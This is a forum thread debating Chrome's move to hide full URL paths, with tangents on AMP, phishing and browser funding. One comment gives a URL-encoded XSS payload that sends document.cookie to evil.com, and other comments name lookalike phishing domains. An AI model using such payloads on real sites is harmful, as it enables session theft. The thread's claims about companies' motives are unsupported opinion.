What are the other browsers' intentions then, who are doing almost the same thing? What about the economic incentive of generally increasing trust in the web and ecommerce, which is highly relevant to their core business?

Also consider the sibling comment about AMP - looks like they already have special behaviour for that so this is barely relevant.


Why assume good intentions when profit and lock-in already explain it?


Try moving in the other direction. Have the browser always show a little bit of the HTML code or some Javascript variables. Will that make it better or worse? What's the correct amount of internal coding information to display to all users? I don't think URLs are the sweet spot of important information without useless mess.


They don't do this for the benefit of the user, but to benefit themselves. It's all about making the web into Google la-la land where they control everything.


I increasingly find myself using other search engines when looking up political content. Google's seems to be censored, or weighted in a way that gives it a heavy political bias. I wish they would just give good search results, like they used to. Would be a lot less hassle.


That's the filter-bubble you're seeing. It's showing you things it thinks you'll engage with, and hiding things it thinks you won't, and the algorithm is too stupid to do that properly but they use it anyway.


Just to play the devil's advocate, removing the URL bar gives slightly more room to display the website.


It isn’t removing the url bar. It’s hiding the full address of the website in the URL box. Your screen real estate is exactly the same.


You are right, I should have read TFA.


Can see this being exploited in some fashion for phishing attacks..


Shouldn't it actually help, seeing as the domain name is the important part? Now users can't get tricked into interpreting the path as part of the domain name.


Even if it does help in some cases, it's hiding the path, which in itself could open other attack vectors. Just host malicious pages on legit sites where you can, and phish for clicks to them, faking the home page look and feel.


While I don’t welcome hiding full URLs at all, and won’t use any browser that doesn’t allow turning that off easily, this matter is more or less orthogonal to phishing.

If the domain-owning organization fails to prevent a third party from hosting a phishing site under a path or a subdomain, that third party is likely well-positioned to deface the existing pages. With a subtle alteration (scripts that capture credentials and transmit them out), the existing pages grant an attacker all of the users with no extra effort, as opposed to distributing a link to a fake page, convincing the user that the page is legit, and in the end getting a fraction of the user base.


For phishing to work you need a similar domain if you want to maximize the number of people conned. Copying the path from the attacked website is the easiest part.

I can even argue that if you take away the path from the URL, then it's actually easier to spot a phishing website, since all you see is the domain if you don't hover over the address bar.


Can you be specific?


This change visibly hides subdomains. On some domains, subdomains represent different sites from different unrelated authors. That being said, it takes trivial effort to clone a site to capture sensitive information, hosted under any subdomain with a valid HTTPS certificate.


Don't think that would be the case. If anything it would only make the user focus on the domain to realize that it might not be legit.


You can be at peace knowing that you're reading news.ycombimator.com


Actually the opposite as _only_ the domain is fully visible


Wow, this is epic scumbaggery. I still stick to Chrome because of all the syncing features it has across the many devices I use: PC, mobile, Mac, and my own laptop. I remember at some time in the past they hid URL query parameters by default, until the user clicked on the address bar.

It's so obvious this move makes it harder for people to copy-paste links, which is a common practice, and moreover misleads people when they try to know what page they're on lol.

test.com/profile or test.com/dashboard/favorites

or many other pages that look like `home pages` of websites are now going to be misinterpreted as actual home pages themselves by users because of this witchery.

If Google thinks this is a good move in that they can get people to land on websites through Search and not directly, it's undoubtedly a massive deal-breaker for people like me.


Firefox can sync between different devices too. What's more, you can even self-host your sync server if you want.


"Showing the full URL may detract from the parts of the URL that are more important to making a security decision on a webpage".

Oh, really? As a security-aware user I really want to see the full URL to make sure it doesn't look something like https://big-vulnerable-site.com/?redirect_url=http://my-mali.... I fail to see a single use case where showing only the hostname or the domain increases the security of the browsing experience. But by now I'm also quite used to Google's way of shamelessly lying their way through.
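
(For context, the standard server-side defense against that open-redirect pattern is to reject absolute redirect targets pointing off-site; a minimal sketch in Python, with the allowlist obviously hypothetical:)

    from urllib.parse import urlsplit

    ALLOWED_HOSTS = {"big-vulnerable-site.com"}  # hypothetical allowlist

    def is_safe_redirect(target):
        parts = urlsplit(target)
        # Relative URLs have no scheme or host; absolute ones must stay on-site
        return (not parts.scheme and not parts.netloc) or parts.netloc in ALLOWED_HOSTS

    print(is_safe_redirect("/account"))                     # True
    print(is_safe_redirect("http://my-malicious.example"))  # False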


> I fail to see a single use case where showing only the hostname or the domain increases the security of the browsing experience.

For you, a power user with presumably years (decades?) using the web and general technical fluency, sure. This doesn't particularly benefit you.

The person it benefits is a beginner (possibly a permanent beginner), who needs to be taught to look at the domain name of websites before typing in their password. This is already an unfamiliar and uncomfortable concept for a lot of people, and forcing them to parse a long string of line noise to find the thing they're supposed to check makes it worse.

It's very difficult for technical experts to put ourselves in the shoes of a permanent beginner. We like using computers. A lot of them hate it, but have to do it to pay their taxes or make appointments with their doctor or see photos of their relatives. We think the idea of protecting ourselves from attackers is neat, because it makes us feel in control. A lot of them think it's horrifying, because they feel out of control and exposed. Adding extra little steps, or little opportunities for confusion, has a big impact on these folks, and they need all the help they can get.


Huh? If I was trying to get people to see that paypal.com.myevilsite.info/paypal/auth/secure is a scam,

then having myevilsite.info be the most prominent thing seems like a win.


So I think the future of mobile computing is that the mobile operating system will be just a browser. This is Google's first step. It's good news, not bad news, if they're heading that way.


I guess Linux distros should start supplying patched Chromium then.


I doubt that Ubuntu moving to shipping Chromium as a snap is a good sign for them doing the right thing with a custom Chromium.


If their goal is really to help detect fraudulent sites (the sorts of google.com.notahacker.tk), they can just show the domain in a more prominent way -- they're already deemphasizing the part of the URL after the domain name anyway.

This is clearly not their motive.

What Google is trying to do here is drift the web away from its most iconic component: the URL. This is the biggest threat to the web that we have loved for so many years.


I assume the goal is to make sure that people never remember the URL and always use Google to get anywhere. Most people probably already do, but maybe increasing their number from 80% to 90% is still worth it.

If this is indeed the real motivation, the next obvious target would be bookmarks. What can be done about them? Replace the bookmarked URLs with Google queries? It would be an interesting functionality if Google could look at a page and give you the smallest query that would have returned exactly this page as the first result. Then bookmark the query instead of the URL. And if the search results change in the future... I suppose it would be possible to spin this as a feature. ("Self-improving bookmarks", perhaps? You don't have to worry about link rot; with the latest Google self-improving bookmarks, your bookmark will always point to the best existing page on a given topic!)


The bookmarking functions in chrome are already extremely weak, I guess for the reason you point out. No tagging, only folders, results when searching don’t get top position in the omnibar.

Bookmarking is one of the areas where firefox is clearly superior.


Same for the history: I much prefer it in Safari to Chrome. It looks like Chrome makes it worthless on purpose so that we use Google instead of looking through our history.


And what’s worse is that none of the other Chromium browsers change it, it really is the worst history/bookmarking UI out there. Firefox’s isn’t much better as it feels plucked straight out of 2003.

It made the Safari 13 Extension-pocalypse so much harder to bear. Every browser I can pick from has something important I have to compromise on.


Don't give them any ideas.


> Google could look at a page and give you the smallest query that would have returned exactly this page as a first result

Maybe like a decade ago this was a student project that Google sponsored (maybe as either Summer of Code or some precursor to that). A student group developed a system for "tagging" a page with a series of "random" but memorable words that could be used to identify a page. Kinda like how imgur and other sites generate URLs now. Like "glittery hamster bananas" or something like that.


> give you the smallest query that would have returned exactly this page as a first result

Just out of curiosity, is there a publicly accessible Google service, or a third-party service, that does this? That would be useful to find more content or points of view about a topic (by looking at the other results).


Maybe this is just one of those pet issues that I can't get behind. Hiding "www" does not strike me as some evil scheme to prevent savvy users from bookmarking websites. It just doesn't.

They already had the feature you are worried about and it's existed since like 1999. Do you remember the "I'm Feeling Lucky" button? You could bookmark a query and it would redirect you to the first result for that search. It was discontinued in 2010 [Wikipedia].

I feel like there are a lot more sane things to be paranoid about in the world right now, but mandatory "I'm feeling lucky" doesn't reach my top 20000.


"I'm Feeling Lucky" was never discontinued [https://www.google.com]. It just got moved to the bottom of the autocomplete list that appears when you start typing.


I assume that crack-smoking UX designers made this decision.



We’ll be back to ‘AOL Keywords’ soon if it were up to them.

“Jerry, you don’t deserve the internet” https://m.youtube.com/watch?v=lcR4h4eIR2E


I honestly don’t think people are paying attention to the URL bar, at least not the people this feature is trying to protect.

If it looks like Google.com, then it is Google.com. The logo even says so.

It’s a dumbing down of the internet, in an attempt to help the average user, but it won’t work, and you’re just making life harder for those who know just a bit more than average.


That's bullshit, it's not an attempt to help anybody but Google.

What better way to keep people on AMP pages, than to make them so ignorant as to not even know how to tell the difference?


What the heck? A regular user doesn’t understand or care what the technical difference between a “regular” page and AMP is. I wouldn’t call this ignorance per se.


Not knowing and not caring is the very definition of ignorance.

Sometimes I wonder if feudalism must have felt like this from the perspective of the noble people. Will there be a dark age followed by enlightenment? Because right now we seem to encounter self-imposed nonage.


This is patently false. I talk to non-tech "regular" users all the time that despise AMP.


This is patently false. I talk to non-tech "regular" users all the time that don’t know what I’m talking about when I mention AMP and its issues.


Count me among them.


Just because they don't care doesn't mean exploiting their ignorance is okay. I don't know that I agree with the GP that this is a targeted move to get AMP to slide under the radar, but if it is we should totally care. AMP undermines the fabric of the web. Just wait for the day that Google starts serving AMP for sites that aren't even configured for it. When they serve an AMP page, they are doing more than being a middle man, they are controlling the traffic and the display of the site, and the user is none the wiser. Google penalizes you for doing the same thing, specifically because it's nefarious.


I'm pretty sure regular people can tell the difference between a regular page and an AMP page. The AMP page simply doesn't work right and it's quite difficult to miss that.


Also, you have to go out of your way to share the original link, so that people know what site you're sharing and get a descriptive link.

AMP adds 2-3 additional actions to that user flow.


What's wrong with AMP pages?



I don’t click on a search result to read google.


Why do you click on a search result?

For me, it’s to get information. Why do I care what format the information is presented in?


They exist.


If you don't know the URL, you won't know if you're on an AMP site or the actual one.


Most users need to care about that as much as they need to care about whether the page is being vended from a fresh server response or local cache.


would you care if you went to mybank.com.sketchysite.us?


Isn't that the point of this change, only showing the domain to prevent phishing?


No, they were already doing that by using color to make the other parts less prominent. There is no better explanation for this change than making people rely more on Google search.


That's a pretty big leap, especially since users can change Chrome's search engine.

There are a couple of reasons they could be making this change highlighted in these threads.


It's the default, and most people who would change it (let's be honest, for privacy reasons) would switch to something like Firefox.


It still feels like you dove into the deep-end of the data collection conspiracy pool before considering other more-likely explanations, like "They have the information now to know that, in general, using color to make the rest of the bar less prominent wasn't sufficient to minimize users feeding data to malicious sites."


A better comparison would be mybank.com/logmein vs mybank.com/login vs mybank.com/l.jx?s=AU8NE6FX5IKMD2

And no, users do not need to care in the slightest whether they go to the first, second or third URL. What they care about is that they are entering their sensitive information on mybank.com's domain and not a Russian counterpart; that's it.


How about mybank.com/login?reflect=%3Cscript%3Enew%20Image().src=%22http://evil.com%22%20+%20document.cookie%3C/script%3E


That URL is utterly indecipherable by 99.99% of Internet users, so displaying it in full does absolutely nothing to protect users.

The onus to protect against a website takeover is on the domain/server owner, certainly not on the browser vendor although they try to mitigate simple attack vectors.

edit: added a few 9s


Well, it switches that 99.99% to 100% now, so a step backwards.

They already used colors to de-emphasize other components; this doesn't look like anything other than pushing people to rely more on Google search.


> Well, it switches that 99.99% to 100% now, so a step backwards.

Protection against malicious links has to happen before you click; by the time the URL is in the URL bar it's already pretty late to mitigate attacks.


Bad analogy. AMP is a Google content proxying technology, and Google isn't generally understood to be a "sketchy site."

Users with the level of paranoia that puts Google in the "untrusted site" space should be sidestepping this whole conversation by avoiding using the browser Google develops regardless of what Google does to its URL bar.


> AMP is a Google content proxying technology, and Google isn't generally understood to be a "sketchy site."

The whole idea of AMP pages is sketchy by default, as it's Google taking content from websites run by news media outlets and hosting it on their own servers so they have even more control over user-tracking.

In the long term, this has the potential to further centralize the Internet, something the Internet was never meant to be.

It's not that difficult to imagine a future where news media won't even host their own stuff anymore but instead outsource it all to Google.

Very comparable to how Facebook has become the de-facto place for small businesses, with little to no IT knowledge, to have their own little web-presence.

Which has certain advantages, but it's dangerous to belittle the very real disadvantages that kind of centralization of content will have in the long term.


Again, people concerned over this risk scenario should be switching to another browser regardless of what it does to the URL bar, right? I doubt we're going to find many users whose thought process runs "I'm really concerned about the long-term risk of Google building a dystopian information warehousing monoculture, but I was still going to use Chrome. But now that they're changing the UI to, I assume, support their goals of building a dystopian information warehousing monoculture, it's A BRIDGE TOO FAR."


>people concerned over this risk scenario should be switching to another browser

IMHO it's our duty as technical users to advocate for a more private, open and de-centralized web for everyone.... We should especially be doing it on behalf of the users who don't understand the long term implications of Google's (anti-) features.

'Just switch to another browser if you don't like it' is not a compelling argument.


That's fine. In my humble opinion it's our duty as technical users to build a web that is both safe and usable by non-technical users. Sometimes we do that via improved privacy, more openness, and decentralization; sometimes we do it by centralization (lists of threat websites, certificate chains of trust baked into browser defaults), less privacy (expecting users to authenticate before making meaningful changes on sensitive data or people's money), and more closed architecture (ad spam countermeasures).

Every tool in the toolbox to make the web better.


But switching to another browser does nothing to challenge AMP, as these changes are mostly pushed on the server-end while changes to the browser end, like this one, serve to further obfuscate this consolidation of Google's dominance on the web.

In that context, it's a bit cynical to belittle the problem as you are doing there, when this has been a very real issue for several years: by now Google, Facebook, and Amazon control the vast majority of web traffic, and have been doing so for years already [0].

This isn't some hypothetical scenario, it's something that's already very real.

[0] https://staltz.com/the-web-began-dying-in-2014-heres-how.htm...


Switching to another browser would let a little air out of the Google hegemony.


Google is "sketchy" for any non-American who wishes not to be subject to the whims of American law and espionage.


Wouldn't Mozilla also fit that description?


Since Mozilla doesn't collect search, browsing, location, and email history — No, it's not the same. It's not even close.


> What Google is trying to do here is to drift the web from its most iconic components: the URL

A few months back, people on HN were wondering why creating a new tab in Firefox causes the URL bar to become magnified.

I wonder if this is part of the reason. Perhaps Firefox believes they have to educate users about the URL bar because Chrome is attacking it.


Word! Frankly, at this point I'm even starting to think that the whole weird "SJW" angle of this thread is also disingenuous, taking us away from the boiling-frog death of the Internet, replaced by AMPed-up centralized commoditization of users, with death to all liberty and openness.


> the boiling frog death

That metaphor is based on a false premise[1]:

> While some 19th-century experiments suggested that the underlying premise is true if the heating is sufficiently gradual, according to contemporary biologists the premise is false: a frog that is gradually heated will jump out. Indeed, thermoregulation by changing location is a fundamentally necessary survival strategy for frogs and other ectotherms.

[1]: https://en.wikipedia.org/wiki/Boiling_frog


In the meantime the post that used the term SJW has disappeared. Oh well.


It and its 101 children are still there if you have `showdead` enabled in your HN settings


I believe this too.

In fact, I think the evidence is not only overwhelming but the tech community is thoroughly compromised, proven so on account of all the recent purges and attacks on wrong-think.

I no longer trust my software.


I don't know why I get downvoted for this when I wrote it based on the reality of the situation.

I guess some people just feel guilty/ashamed!


> What Google is trying to do here is to drift the web from its most iconic components: the URL. This is the biggest threat to the web that we loved for so many years.

Safari has hidden the full URL since 2014. For the vast majority of users, the full URL is just noise.


The URL bar takes up a huge amount of screen real estate and is a piece of information that the user almost never needs once they have confirmed they navigated successfully to the desired page. Developers are a special case user and capable of handling advanced UIs that hide information until it is needed.

It's iconic but it's a UI space resource hog. To improve browser experience, sometimes one has to be willing to try slaughtering a sacred cow.


Hmm, don't all mobile browsers already autohide the URL bar when the page starts scrolling up? Seems like that worked fine so far. Besides the OP is about hiding part of the URL (path), not the URL bar of the browsers.


Seems Firefox Preview doesn't, and I honestly prefer it that way. They moved it to the bottom of the screen, which makes it easier to use and less intrusive.


Hiding part of the path allows them to shrink the bar horizontally, which leaves more room for other content, such as chrome extensions.


The URL can already be longer than the screen to begin with, so they could still do that and show as much as will fit, showing the rest if you click on it. This is already what Firefox does.


But from a UI standpoint, having a text box that is too small for its common displayed content is sloppy. If the path usually makes things too long, hide the path by default until the user asks for it.


It's only too small when it's too small.

https://old.reddit.com/r/space/

Fits fine and tells you at least three useful things that just "reddit.com" doesn't.

https://old.reddit.com/r/space/comments/h8t50n/i_often_get_a...

Doesn't fit, but even truncated it still tells you the same useful things.


But that's useful information that's told me redundantly by the page title and the banner at the top of the page also. I don't need the URL bar for that.

In fact, using the URL bar for it assumes that the path has semantic meaning, which is not an assumption that the URL standard actually requires.


> But that's useful information that's told me redundantly by the page title and the banner at the top of the page also. I don't need the URL bar for that.

The page isn't required by anything to contain that information or to give it accurately. How do you distinguish example.edu/financial-aid/ from example.edu/~some-student/ ?

> In fact, using the URL bar for it assumes that the path has semantic meaning, which is not an assumption that the URL standard actually requires.

It doesn't assume anything, it just shows you the URL. If it has semantic meaning then you can see that -- which it commonly does.


> How do you distinguish example.edu/financial-aid/ from example.edu/~some-student/

That's an unrealistic example because no website worth its salt is going to let students put arbitrary content in the same domain as the financial aid system. That's a recipe for leaking cookies that contain session tokens, and displaying a full URL won't save a user.

By the time you see the ~some-student in the URL bar, the security game is over.


You're making a lot of assumptions there.

It could be that example.edu/financial-aid/ is just information and PDFs and doesn't have any sessions or cookies. Or the real financial aid system is on another domain, but a first time user doesn't know that, they're just looking at www.example.edu/~some-student/ which appears to be a financial aid page that Chrome only says is example.edu.

Or any other case where the contents of the URL matters. How about example.edu/~some-student/ vs. example.edu/~a-different-student/ or example.edu/~your-professor/?


That hypothetical naive first-time user is going to be as fooled by ~financial-aid, or by ~some-user/financial-aid. Showing the full URL path doesn't fix that risk scenario.

The other scenario you describe, if the risk is someone intentionally deceiving users by cloning a page on the university network owned by someone else for deceptive purposes, is better solved by a university disciplinary hearing than by expecting every student to understand URL paths.


> That hypothetical naive first-time user is going to be as fooled by ~financial-aid, or by ~some-user/financial-aid.

The attacker may not be able to get ~financial-aid, only ~juan-ramirez, and even if you don't know about home directories, the first thing that strikes you about ~juan-ramirez/financial-aid is that something is wrong because you are not Juan Ramirez. If you do know about home directories then it's a giant red flag which you can't see if the browser is hiding it from you.

It doesn't have to prevent 100% of attacks. Preventing 7% of attacks is still 7% better than nothing.

> The other scenario you describe, if the risk is someone intentionally deceiving users by cloning a page on the university network owned by someone else for deceptive purposes, is better solved by a university disciplinary hearing than by expecting every student to understand URL paths.

The most common way things like that happen isn't the actual student who would have to be using their own name, it's that the student uses a weak password or gets their computer infected with malware and then some Russian hacker sets up on their school account.

You also don't need every user to understand them, only one who then reports it. If you don't show the paths to anybody then it's much more likely that nobody notices, or that it takes longer for somebody to notice, and more people get compromised in the meantime.


> the first thing that strikes you about ~juan-ramirez/financial-aid is that something is wrong because you are not Juan Ramirez

User studies indicate that the first thing a user notices is... Nothing. The gobbledygook in the path is so much noise for the average user that they don't notice if the path seems off. In fact, it makes sense to hide it from a security standpoint to decrease the odds that users go information blind to the domain, because we already know that improper domain routing to lookalike domains is, by far, the most common vector for credential theft.

There isn't even a guarantee that showing the path to address the 7% case (which really looks more like 0.07%) will on average cause the incidence of users being compromised to go down, if it means users are less likely to notice that the subdomain and domain are off.

I'm sure that for the people who really care, it won't take long to hack together a chrome extension that drops the full URL into the page title or a pop-up box on the page itself.


> User studies indicate that the first thing a user notices is... Nothing.

There are a thousand ways to screw up a user study, but one of the best ways to detect a screw up is if they say that users either always or never do something.

> In fact, it makes sense to hide it from a security standpoint to decrease the odds that users go information blind to the domain, because we already know that improper domain routing to lookalike domains is, by far, the most common vector for credential theft.

Which is why it makes sense to highlight the domain. Make it a different color. Make it a bigger font size. That still doesn't require you to omit the rest of the URL.

> I'm sure that for the people who really care, it won't take long to hack together a chrome extension that drops the full URL into the page title or a pop-up box on the page itself.

Except that the people who actually do that really are the 0.07%, and you've still lost the 6.93% who would've noticed if you'd put it in front of them but aren't about to actively change the default you gave them ahead of time.


You're using concrete numbers but you don't have the statistics or analysis to know what the numbers are. I'm going to assume the company that has telemetry on its own product does.

... but probably more importantly, nobody likely needs to hack together an extension after all. Here's an older news story about how Chrome will add a non-default option to show the full URL.

https://www.zdnet.com/article/googles-chrome-will-give-you-a...


To improve the browser experience all you have to do is use a computer that doesn't suck. The fact that your primary browser is on a tiny phone display is a problem with phones, not with browsers. Browsers for phones can evolve to match the limited nature of their devices, but let's hope such gimpings don't filter back into actual desktop computers.


"Spend more money on your computer" is a fine solution for a bay area software engineer. It's not a solution at all for the half of America that would have to sell their car to cover a $400 ER visit.


I make under $12k/year. I live in the midwest. I would have to sell my car for a $1k ER visit.

It's still cheaper to build a $450 real desktop computer (that lasts decades) than it is to buy an $800 smartphone with a four-year life that can't do any productive work and isn't in my control.

(And my $20 nokia dumb phone has worked perfectly since 2006 for phone calls/text.)


You live in the midwest United States; you're not the user we're talking about.

We're talking about the person in small-town India who has a Micromax Black Q385 Spark 3 with 8GB storage, 1GB RAM, and a 5.5" screen, which they bought for $50. They also get their Internet access through the cellular equivalent of a drinking straw.

(Even still, my personal guess is that this URL bar change isn't about them; it's about the desktop experience).


I don't think Chrome can run on a machine like that.


Desktop computers are available waaay cheaper than phones.


I'm actually not thinking about the phone form factor at all. A shorter URL bar on the desktop allows it to take up less horizontal space, which leaves more room for Chrome extensions.

Also, "use a real computer" is a pretty elitist attitude that misses Google's goals overall. Google is not targeting exclusively users that have desktop machines with multiple cores and graphics accelerator cards. They want to provide internet services and internet access to people whose only portal to the web is a mobile device.


> A shorter URL bar on the desktop allows it to take up less horizontal space, which leaves more room for Chrome extensions.

Are you seriously claiming you need all (or even just more than like 10%) of your 1920+ pixels of screen width for your Chrome extensions?


I have a lot of chrome extensions, yes.


To the point where screen space is becoming tight? You are probably something like 0.001% of users.


> misses Google's goals overall.

Oh, I'm not missing that. Google's software offerings are now primarily designed for bad computers with bad UI, bad network, and bad energy storage. Because people love those crappy devices and most use them primarily. We both agree.

>A shorter URL bar in the desktop allows for to take up less horizontal space,

Which really doesn't matter if you're on a desktop computer with an actual monitor. The only reason to do this is more "convergence" BS and thinking phone crutches are required on desktop.


Agree to disagree, because my primary device is a multi-core desktop with a curved monitor over two feet long and I still think the URL bar takes up too much horizontal space in my browser top bar.


Maybe the problem is that widescreen is BS for most things anyway. In most applications there is so much empty space on the left and right sides. That's why I don't use wide-only monitors; mine have height as well. A 43" 4K is nice to work with.


I'm sorry to say, but you're a bit naive if you think they're doing it for cosmetic reasons.


1) I'm not generally in the habit of prognosticating all of the reasons a corporation the size of Google tries to do something, especially not when there's an apparent and obvious win possible from the change itself. Minimizing the URL bar leaves room for other things on the page, including chrome extensions and, possibly, page content.

2) UI improvements are not "cosmetic reasons," they directly translate to ease and efficiency of task completion. As a UI engineer, hearing my category of work called "cosmetic changes" can be, quite frankly, exhausting. If someone were to halve the default font sizes on all browsers, would we consider that a mere "cosmetic change" or would it be a change that would have direct and immediate impact on people's ability to accomplish tasks?


Well, I'm exhausted by UI/UX engineers oversimplifying things that are inherently complex, to the point of not really helping people simplify their work while totally hindering advanced users. There is a reason industrial UIs usually don't suffer from this: complex interfaces are there for a reason.

You know what else is "a UI space resource hog" on the web? Advertising. And I'm sorry, but that "wasted" space is generally much bigger. So, no, I'm not ready to lose my address bar for bigger ads.


There's a reason most commodity software doesn't adhere to industrial UI standards.

Chrome is well into the commodity software scale, and one should assume its UI decisions will lean in the direction of maximum utility for the most users.


The problem this supposedly solves is a real one, but pushing only the most extreme solution suggests that it's not the real motivation.

If the problem is that showing the whole URL might hide the domain, why not make the domain bold, or highlight it some other way? What about separating the domain and path when viewing (but not when editing)? It's a bit hard but quite possible.


I'm pretty convinced this is going to lead to more tracking metadata shoved into the URL. I don't know if the real incentive was that users weren't clicking links with very obvious tracking or tons of URL params, but I'd put money down today that this will be the most significant end result. Thanks, Google.


Pretty ironic for a company that wouldn't exist except for the ability to crawl and index URLs. So now only the domain and TLDs are to be shown. I presume that a "full" URL can be typed once the URL bar is clicked though? But any guesses how long until they remove the ability to enter URLs?


>Pretty ironic for a company that wouldn't exist except for the ability to crawl and index URLs.

It's called "kicking the ladder after climbing the wall".


They will not, as it would cause a serious backlash from web developers for turning it into a Googlenet viewer rather than a web browser.


I've stopped using Chrome; it's optional, after all. Firefox is my go-to browser at this moment in time.


Whoever at Google is responsible for this, I suggest they read this: http://worrydream.com/MagicInk

I guess they forgot what "information software" means. I use Firefox, but this is just bad design.


I haven't read it yet, but the movies in those examples ("Rainman Forever", "Die Hard With More Intensity", etc.) sound fantastic. And they all feature Jet Li.


I think web developers are so used to URLs they don't realize how ridiculous they are. If you were inventing the web from scratch, there's no way you'd require a non-human-readable string displayed in the most prominent position on every single page and it's editable! How do people know how to edit it? Each site has its own unique undocumented parameters and formatting. It tells you something about the state of the page but not everything needed to debug problems. Also, don't make a SPA with an unchanging URL because you'll lose all the "important" value of a URL.

Desktop and mobile apps somehow survive without them. If URLs are important, why don't developers include their own URL system in those?


Firefox mobile syncs beautifully with desktop, and they have a standalone password manager app that syncs with your browser's password manager, maybe you'll find it useful.

There's also an accessibility setting to always force zoomability, even when the site disables it.


I'm a Firefox user, but I don't see myself using Lockwise, it's too lacking in features, not to mention the security caveats of using your browser's password "manager". You're better off using a third party like Bitwarden or KeyPass.

Edit: Brain mashed together 1Password and KeyPass.


This might be harmful to github pages where it would hide the repository name. If they include this without offering an option to turn it off, I will quit using Chrome.


I switched to Firefox years ago and never looked back.


I never switched away from Firefox. I am old enough to know that nothing comes free, especially from a Big Corporation. As customers, all we can do is to always keep a good alternative alive, no matter what.


But Chrome is not free (well, kind of). It saves lots of money in royalties for Google (because Google Search is the default search engine in Chrome). So even if it's 'free', it saves money for Google.


Firefox isn't free either. It's just paid for by Google.


The other day I heard Firefox described as Google's antitrust lawsuit insurance...


Hah, that actually makes me happy as a no-break Firefox user since 2003. At least that means Google will continue to support Firefox independently for as long as they're in the browser business.


They also support Bing


That doesn't mean its behavior is the same.


True, but then I’m not sure Mozilla would be able to survive if Google stopped their deal with them due to say, adding ad-blocking to Firefox by default. Not the same, but it certainly influences the direction of FF.


> but it certainly influences the direction of FF

I don't think Mozilla's trying to please Google in any way. Google's keeping Firefox around to try to avoid the appearance of a total monopoly.

But Mozilla's behavior certainly is influenced by trying to find alternative business models, sometimes perhaps not with the best results (Mr Robot promotion, everyone). I still think it's worth using over Chrome.


This is true, but then again absolutely all browsers are being funded by ads. We are talking Edge, Safari, Brave, all of them.

Did you know that Apple does in fact get more money from Google than Mozilla does, for keeping their search engine as the default? 12 billion dollars in 2019. Do you think Apple would activate ad blocking by default and risk losing that many billions of dollars? Speaking of which, Safari's ad blocking is the joke of the industry.

You could make the case that Safari might survive if Google cuts its funding, but judging from the history of IExplorer, I have my doubts. One could make the case that Safari is alive just because Apple is making a shit ton of money on it.

Did you know that Microsoft's Bing Ads platform made them 8 billion dollars in 2019? Do you think Microsoft would do anything to jeopardize that ads revenue? Did you know that Windows 10 has an "advertising ID" used to personalize ads, that via Edge is transmitted to Bing?

Did you know that Brave, that leech which is piggybacking on other people's work, that's supposedly blocking ads by default, is effectively replacing publisher ads with their own, then forcing those publishers to enter into deals with them for a piece of the action, while making it really hard to detect and block Brave? All the while pushing shady cryptocurrency affiliate ids straight in their source code?

---

Mozilla might not push for ads blocking by default.

But they do block trackers by default, and their browser is AFAIK the only one that legitimately supports uBlock Origin on Android. And uBlock Origin is the best, most aggressive ad blocker available, and given Google deprecating the blocking ability of the webRequest API, Firefox might remain the only one with a uBlock Origin implementation.

Could Firefox survive without Google?

I don't know, but can any other browser survive without Google or Bing? I have my doubts and you'd be naive to think otherwise. Plus this is just whataboutism.


None of the things you mentioned about Brave make them funded by Google, and the system they want for ads is clearly better for the consumer than the status quo.


Brave is essentially a repackaged Chrome and does nothing to help undermine the Blink monopoly. They're not directly funded by Google, but their browser depends directly on Google funding Chrome's development.


If Google disappeared tomorrow, Brave would continue to exist and would continue to get updates.

Brave does not depend on Google, directly or otherwise. They depend on an open source project called Chromium, which is largely developed by Google, but because it is open source anyone can build off of it.

Brave funds their development through the BAT token and through affiliate marketing, both of which are much better for user privacy and security, and much more resilient to Google than where Mozilla is getting its money.

No, I don't think Apple would integrate thorough ad-blocking by default, just as I don't think Mozilla will do this either. Brave has already done it. Brave's ad-blocker works better by default than any ad-blocker I've used, and I've tried them all.

HN's hate-boner for Brave is very strange. They clearly care more about user privacy than any other browser vendor (except maybe Safari, but again they have a conflict of interest), and it is built on a core that is arguably the best at handling the modern web (Chromium).


> If Google disappeared tomorrow, Brave would continue to exist and would continue to get updates.

Microsoft wasn't able to keep developing a browser on their own, I doubt that Brave could. The problem is that a browser nowadays is so complex to develop that you need serious resources to invest in it. Without Google's ongoing development, Brave would not survive. And given Google's changes to undermine ads blockers, it's going to be interesting to see Brave struggling to maintain their fork.

---

> much better for user privacy and security

Right, keep telling yourself that.

Btw, I actually wonder how what Brave is doing isn't copyright infringement, given they are directly profiting from blocking the ads of publishers. I guess they are small enough to not matter, for now.

---

> Brave's ad-blocker works better by default than any ad-blocker I've used, and I've tried them all.

I worked on anti-ad-blocking technology.

Nothing beats uBlock Origin running on top of Firefox; everything else was strictly inferior. Not even blocking JavaScript in the page works, because you can easily force the user to enable JS for you by breaking the content on that page. uBlock Origin was so bad for us that we avoided fighting it entirely, leaving it as something for people frustrated with AdBlock Plus to turn to, sort of like in the Matrix.


> Microsoft wasn't able to keep developing a browser on their own, I doubt that Brave could. The problem is that a browser nowadays is so complex to develop that you need serious resources to invest in it. Without Google's ongoing development, Brave would not survive. And given Google's changes to undermine ads blockers, it's going to be interesting to see Brave struggling to maintain their fork.

IE was woefully out of date. MSFT then tried to build a browser from scratch. That was a lot of effort, so they decided to fork Chromium (like Brave) instead. What exactly do you think would happen if Google disappeared tomorrow in their case? Do you think they would go back to trying to build their own browser from scratch? No, they'd just keep developing Chromium. Many (most) changes would probably be upstreamed. Forking a browser and maintaining it is orders of magnitude easier than starting from scratch in [current year]. As you point out, there are now multiple parties building on Chromium, so I'm sure the slack could be picked up if Google switches gears. But you're right, maybe Brave won't be able to keep up with upstream changes that make ad-blocking harder. In that case, you can always just switch browsers. In the meantime, however, I'll use the browser that does a better job of protecting privacy by default.

> Right, keep telling yourself that.

Luckily, I don't need to. A browser that blocks ads by default is objectively better for user privacy and security than one that doesn't.

---

> Btw, I actually wonder how what Brave is doing isn't copyright infringement, given they are directly profiting from blocking the ads of publishers. I guess they are small enough to not matter, for now.

They aren't directly profiting off of ad-blocking, so maybe that helps.

---

> I worked on anti-ad-blocking technology. Nothing beats uBlock Origin running on top of Firefox, everything else was strictly inferior.

Have you actually tried Brave? It works better for me, and I've tried Firefox with uBO. I've also tried Chrome with uBO. Brave blocks both ads and tracking more consistently across the board. It occasionally breaks a webpage, but I have reported those to Brave and two of them have been fixed (out of like 5). This process is clearly better for users than everyone having to configure their uBO and uMatrix rules separately. Brave is creating a web where all the privacy-violating / attention-grabbing shit is very much blocked by default, in a much stricter way than the other options. When this breaks the internet, they fix it, and because the fix is part of the blocker it fixes it for everyone.


> If Google disappeared tomorrow, Brave would continue to exist and would continue to get updates.

